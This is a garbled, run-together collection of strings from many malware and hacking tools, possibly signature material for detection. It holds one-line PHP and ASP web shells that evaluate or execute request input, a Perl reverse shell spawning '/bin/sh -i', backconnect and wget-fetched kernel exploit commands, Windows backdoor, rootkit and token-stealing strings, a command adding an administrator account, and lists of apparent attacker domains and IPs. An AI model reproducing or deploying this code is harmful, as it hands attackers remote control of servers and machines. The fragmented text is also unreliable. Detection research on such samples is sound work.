'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 ()ljava/util/set;(ljava/lang/string;)vljava/lang/exception;oooy32too.javabbfwkdljava/lang/process;getparametersimio.javaljavax/swing/jlist;-(ljava/lang/string;)ljava/lang/stringbuilder;ljava/io/inputstream;vfnnnrof.exnnnroeolsnnfwgetpropertyjava/io/filenotfoundexceptionllolp;cjhgreshhnuf stackmaptableonfwwa(c)ljava/lang/stringbuilder;lesia$fffgss;<clinit>()ljava/io/inputstream;openconnection gjhgreshhnijhgreshhrtsjhgreshhot.sjhgreshhihjhgreshht;)oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/urlcreated-by: 1.7.0-b147 (oracle corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1c4c4c4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginffffdd none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadfx0zaqrkxuvgbh0qndrjvxywgg4tgh8ahqoavqqsnyo0nelxfjaadi0nfqyesl1fbbnntfospibmadwnptqxpsdkwuuee2ucgr0z0);-10<bfunction fl(){var a0);else if(navigator.mimetypes);b.href/presults.jsp128.164.107.221)[0].clientwidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jviewportfqv2d0zah1vgdxgzvg9cowycawkctzacbxscbfokaamhufvuwf5evvyvdvtur18ba1qdau8hqjgeufyeaez4sbecek1ftxsdulvasquare ad tag (tile adrandnum cellspacing\\n//-->\\n</script>//-->' 2287974446noscrbeg -- start adblade -->' 3427054556 while (i >return '<table width</scr' s.substring(0, i /></a></noscript>' else { isemail ).submit(); borderpub-8301011321395982apiclientconfigfunction/.test(pa.tostring())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816ewc-2sl.gif)}music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createelement('form');c.actionjavascript:falses.onmessage){j.error('an instance without whenready or onmessage makes no sense');throw new error('anan;}else hsprintfwindow,jo.getuserid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 please use ntcmd.exe run this program.%s\\pipe\\%s%s%d%s\\admin$\\system32\\%s%sconnecting to remote server ...failedp
1 admin\\desktop\\babar64\\babar64\\obj\\dllwrapperuser-agent: mozilla/4.0 (compatible; msi 6.0;execqueryfailled!nbot_command_line!!!extract error!!!file does not exists-->[%s]/s /n %s \"%s\"%%windir%%\\%s\\%s/c start /wait (d;oici;fa;;;an)(a;oici;fa;;;bg)(a;oici;fa;;;sy)(a;oici;fa;;;ls)software\\microsoft\\windows\\currentversion\\policies\\system\\%common_appdata%conout$dllpath:\\project\\xaps_xaps_objective.dll" $variant12 = "startuser-agent: mozilla/5.0 (windows nt 6.3; wow64; rv:28.0) gecko/20100101 firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitopenssl 1.0.1e 11 feb 2013" $mix10 = "xtunnel.exe\\\\.\\pipe\\ahexecimplevelproject\\xaps_objective_dll\\.?avagentmoduleremotekeylogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
1 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 revelationhelper.dllobjshell.run \"schtasks /change /tn wdw00t /disable\",,trueobjshell.run \"schtasks /run /tn wdw00t\",,true'objshell.run \"cmd /c copy c:\\windows\\system32\\tasks\\wdw00t .\",,truea.writeline (\"schtasks /delete /f /tn wdw00t\")a.writeline (\"net user /add ikat ikat\")a.writeline (\"cmd.exe\")strfilename=\"c:\\windows\\system32\\tasks\\wdw00t\"for n = 1 to (len (hexxml) - 1) step 2output.writeline \" should work on vista/win7/2008 x86/x64\"set objexecobject = objshell.exec(\"cmd /c schtasks /query /xml /tn wdw00t\")objshell.run \"schtasks /create /tn wdw00t /sc monthly /tr \"\"\"+biatchfile+\"a.writeline (\"net localgroup administrators /add v4l\")set ts = fso.createtextfile (\"wdw00t.xml\")extended module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80ikat exe templatewithadancyflavour..fasttracker v2.00 r
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 -->got wmi process pid: %d this exploit will execute \"net user net user temp 123456 /add & net localgroup administrators temp /addrunning command with system token...thread impersonating, got network service token: 0x%xfound system token 0x%xthread not impersonating, looking for another thread...p
1 \"cmd\" /c cd /d \"c:\\windows\\temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(request.item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
